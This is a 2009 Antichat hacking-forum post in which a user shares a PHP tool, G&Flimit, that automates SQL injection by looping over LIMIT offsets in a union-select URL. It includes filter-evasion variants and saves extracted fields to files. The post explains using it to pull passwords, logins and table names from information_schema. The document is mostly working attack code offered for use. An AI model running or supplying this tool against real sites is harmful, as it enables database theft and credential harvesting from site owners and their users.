Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
G&Flimit - выборка полей или таблиц. |
04.03.2009, 14:55
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
G&Flimit - выборка полей или таблиц.
G&Flimit ver.1.0
Вполне есть анаголи, но хочу предуставить свой)
Суть скрипта выборка полей или таблиц(при наличие Mysql>5).
Для роботы достаточно заменить concat(0x2b7c,categor,0x7c2b) -> categor на нужное вам поле, ето может быть password, name, login или если ето выборка таблиц table_name, но напомню что нужно потом в url скули дописать from+information_schema.tables
Как и у всех скриптов есть свои недостатки:
для выборки нужно сначала узнать МАХ лимит та вписать в поле, но думаю когда будет время допишу.
PHP код:
<?
////////////////////////////////////////////
// Graber and Filters limit in sql-injection ver.1.0 //
// Coder By Micr0b //
// icq: 532-415 //
////////////////////////////////////////////
?>
<html>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<head><title>G&Flimit</title>
<style>
body{
margin: 200 150;
background: #666;
font: normal 13px Arial, Helvetica, sans-serif;
color: #666;
}
table,td{
border: 1px dashed #444444;
background-color : #F4F4F4;
font: 12px courier new;
color: #888888;
}
input,select{
background-color: #000000;
font: 8pt verdana;
text-align: left;
color: #669666;
}
</style>
<body>
<table>
<tr>
<td>
<font color="green"><h2><center><u>G&Flimit</u> by Micr0b ver.1.0</center></h2></font>
<form method="post">
<input type="type" name="url" value="http://coder/mysqltools/testing_injection/index.php?i=-1+union+select+1,concat(0x2b7c,categor,0x7c2b),3,4+from+categors" size="115">
<select name="limit">
<option selected value="+limit+">+limit+</option>
<option value="%20limit%20">%20limit%20</option>
<option value="/**/limit/**/">/**/limit/**/</option>
</select>
<font color="red">max(<input type="type" name="count" size="5">)</font>,1
<select name="end">
<option value="">null</option>
<option selected value="/*">/*</option>
<option value="--">--</option>
</select>
<!-- <select name="mysql5">
<option selected value="">null</option>
<option value="table_name">table_name+from+information_schema.tables</option>
<option value="column_name">column_name+from+information_schema.columns+where+table_name='users'</option>
</select>
-->
<center>
<input type='checkbox' onChange="if(this.checked){document.all.start.disabled=false;}else{document.all.start.disabled=true;}">
<input type="submit" name="start" disabled="disabled" value="Старт" style="cursor:pointer">
</form>
<br><br>
<form method="POST">
<input type="submit" name="musor" value="Очистка" style="cursor:pointer"></center>
</form>
</td>
</tr>
<tr>
<td>
<?php
if($_POST['start']){
$limit=$_POST['limit'];
$count=$_POST['count'];
$url=$_POST['url'];
$end=$_POST['end'];
$fp=fopen("save.txt", "w");
for($i=0;$i<$count;$i++){ // скільіки разів повторювати цикл
$input=@file_get_contents($url.$limit.$i.",1".$end);
fwrite($fp, $input);
}
fclose ($fp);
echo "<font color='#669666'><center>Можете відфільтрувати! <b>save.txt</b></center></font>";
}
if($_POST['musor']){
$input=@file_get_contents("save.txt");
$oprede = "+|";
$oprede2 = "|+";
preg_match_all('|'.preg_quote($oprede, '/').'.*'.preg_quote($oprede2, '/').'|s',$input,$out);// |+|/.*|+/|s
$sd = explode($oprede2,$out[0][0]);
$cnt = count($sd);
$zapis=fopen("good.txt", "a+");
for ($i=0;$i<$cnt-1;$i++) {
preg_match_all('|'.preg_quote($oprede, '/').'.*|s',$sd[$i],$out1);
$str = str_replace($oprede,"",$out1[0][0]);
fwrite($zapis, $str."\n");
}
fclose ($zapis);
echo "<font color='#669666'><center>Очищено вдало. Перевірити: <a href='good.txt'><b>good.txt</b></a></center</font>";
}
?>
</body>
</td>
</tr>
</table>
Последний раз редактировалось Micr0b; 04.03.2009 в 15:04..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид